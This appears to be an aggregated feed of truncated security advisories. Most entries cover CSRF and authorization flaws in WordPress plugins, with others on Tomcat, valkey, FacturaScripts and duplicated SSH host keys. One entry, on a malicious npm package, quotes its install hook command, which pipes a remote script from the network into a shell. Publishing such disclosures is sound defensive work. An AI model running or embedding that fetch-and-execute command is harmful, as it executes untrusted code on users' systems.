EUVD-2026-31028

The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious...

CVE-2026-8420

The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious...

RLSA-2026:19184 Important: grafana-pcp security update

The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards. Security Fixes: net/url: Incorrect parsing of IPv6 host literals in net/url CVE-2026-25679 For...

PT-2026-42078

Name of the Vulnerable Software and Affected Versions BLOGCHAT Chat System versions prior to 1.3.6.4 Description The BLOGCHAT Chat System plugin for WordPress contains a Cross-Site Request Forgery CSRF flaw. This occurs due to missing or incorrect nonce validation—a security token used to ensure...

PT-2026-42061

Name of the Vulnerable Software and Affected Versions Word 2 Cash versions prior to 0.9.3 Description The Word 2 Cash plugin for WordPress is subject to Cross-Site Request Forgery CSRF which can lead to Stored Cross-Site Scripting XSS. This occurs because the w2c admin function lacks nonce...

NVIDIA Nano SSH Key Duplication

A potential security vulnerability has been identified in some HP ZGX Nano G1n AI Station products where identical SSH host keys were deployed during the manufacturing process prior to March 19th, 2026. Successful exploitation might lead to unauthorized code execution, privilege escalation, denia...

PT-2026-42077

Name of the Vulnerable Software and Affected Versions Amazon Scraper versions prior to 1.2 Description The Amazon Scraper plugin for WordPress contains a Cross-Site Request Forgery CSRF flaw. This occurs because of missing or incorrect nonce validation—a security token used to ensure requests are...

Malicious code in @riteshkumar04/stack-audit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 145196e93f9e6006134b35a8d5abfe7fa0de18f2d52b6712d8b2a5ec036526bc On npm install, scripts/install.js runs curl -sSL https://raw.githubusercontent.com/neutron420/StackAudit/main/scripts/install.sh | sh or the...

CVE-2026-47100

Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject...

CVE-2026-47100

Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject...

EUVD-2026-30936

Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject...

CVE-2026-47100 Funnel Builder for WooCommerce Checkout < 3.15.0.3 Missing Authorization via AJAX

Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject...

CVE-2026-47100

CVE-2026-47100 affects Funnel Builder for WooCommerce Checkout (FunnelKit) prior to version 3.15.0.3. The vulnerability is a missing authorization flaw in the public checkout AJAX flow (update_order_review) that allows an unauthenticated attacker to invoke internal methods and write to the plugin...

CVE-2026-47100 Funnel Builder for WooCommerce Checkout < 3.15.0.3 Missing Authorization via AJAX

Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject...

tomcat: Apache Tomcat: Security constraint bypass for CGI scripts

A flaw was found in the CGI servlet component of Apache Tomcat. This vulnerability allows a security constraint bypass via improper handling of case sensitivity in the pathInfo component of a URI mapped to the CGI servlet...

PT-2026-41938

Name of the Vulnerable Software and Affected Versions Funnel Builder for WooCommerce Checkout versions prior to 3.15.0.3 Description A missing authorization issue in the public checkout endpoint allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's...

EUVD-2026-30813

FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting XSS vulnerability through the fsNick cookie parameter. The application reflects the cookie's value directly into the HTML without sanitization. The fsNick cookie ...

OPENSUSE-SU-2026:20776-1 Security update for valkey

This update for valkey fixes the following issues - CVE-2025-67733: data tampering and denial of service via improper null character handling in Lua scripts bsc1258746. - CVE-2026-21863: denial of service via invalid clusterbus packet bsc1258788. - CVE-2026-23479: use-after-free in unblock client...

[SECURITY] Fedora 44 Update: uv-0.11.11-1.fc44

An extremely fast Python package and project manager, written in Rust. Highlights: =E2=80=A2 A single tool to replace pip, pip-tools, pipx, poetry, pyenv, twi ne, virtualenv, and more. =E2=80=A2 10-100x faster than pip. =E2=80=A2 Provides comprehensive project management, with a universal lockf...

FacturaScripts 信息泄露漏洞

FacturaScripts is an open-source ERP software developed by Carlos Garcia, a Spanish developer. Versions of FacturaScripts prior to version 2026 contained a vulnerability related to information leakage. This vulnerability stemmed from the Library module not clearing the EXIF/XMP/IPTC metadata...